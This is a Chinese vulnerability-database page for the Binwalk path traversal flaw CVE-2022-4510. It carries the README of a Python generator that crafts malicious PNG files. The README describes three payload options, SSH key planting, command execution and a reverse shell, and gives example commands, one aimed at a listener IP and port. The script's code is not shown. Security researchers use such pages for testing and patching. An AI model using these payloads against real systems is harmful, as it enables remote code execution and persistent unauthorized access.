POC详情: 0ba310c12dd1892412fdfb1505ad73b5700f558f

来源
关联漏洞
标题: Binwalk 路径遍历漏洞 (CVE-2022-4510)
描述:Binwalk是ReFirm Labs开源的一种快速、易于使用的工具。用于分析、逆向工程和提取固件图像。 ReFirm Labs Binwalk 2.1.2b版本至2.3.2版本存在路径遍历漏洞,该漏洞源于存在路径遍历,通过制作恶意PFS文件系统文件,攻击者可以在任意位置提取文件。
描述
A Python script for generating exploits targeting CVE-2022-4510 RCE Binwalk. It supports SSH, command execution, and reverse shell options. Exploits are saved in PNG format. Ideal for testing and demonstrations.
介绍
# CVE-2022-4510-Binwalk

This script allows you to generate exploits for targeting CVE-2022-4510 Binwalk vulnerabilities. The exploits can be used for testing and demonstrations. The supported options include SSH, command execution, and reverse shell.

## Prerequisites
- Python 3.x

## Usage
1. Clone the repository or download the script file.
2. Run the script with the desired options. The available options are:
   - `ssh`: Generate an exploit for SSH.
     - Arguments:
       - `file`: Path to the input .png file.
       - `pub`: Path to the public key file.
   - `command`: Generate an exploit for executing a command.
     - Arguments:
       - `--command`: Command to execute.
       - `file`: Path to the input .png file.
   - `reverse`: Generate an exploit for reverse shell.
     - Arguments:
       - `file`: Path to the input .png file.
       - `ip`: IP address of the listener.
       - `port`: Port number of the listener.

Example usages:
```
python exploit_generator.py ssh input.png public_key.pub
python exploit_generator.py command --command "ls -l" input.png
python exploit_generator.py reverse input.png 192.168.0.100 4444
```

## Output
The generated exploit will be saved as `binwalk_exploit.png` in the current directory.

## Disclaimer
Use this script responsibly and only on systems that you have permission to test or demonstrate vulnerabilities. The author is not responsible for any illegal or unauthorized use of this script.

## References
[https://github.com/electr0sm0g/CVE-2022-4510](https://github.com/electr0sm0g/CVE-2022-4510)
文件快照

[4.0K] /data/pocs/0ba310c12dd1892412fdfb1505ad73b5700f558f ├── [6.9K] LICENSE ├── [1.5K] README.md └── [3.3K] walkingpath.py 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。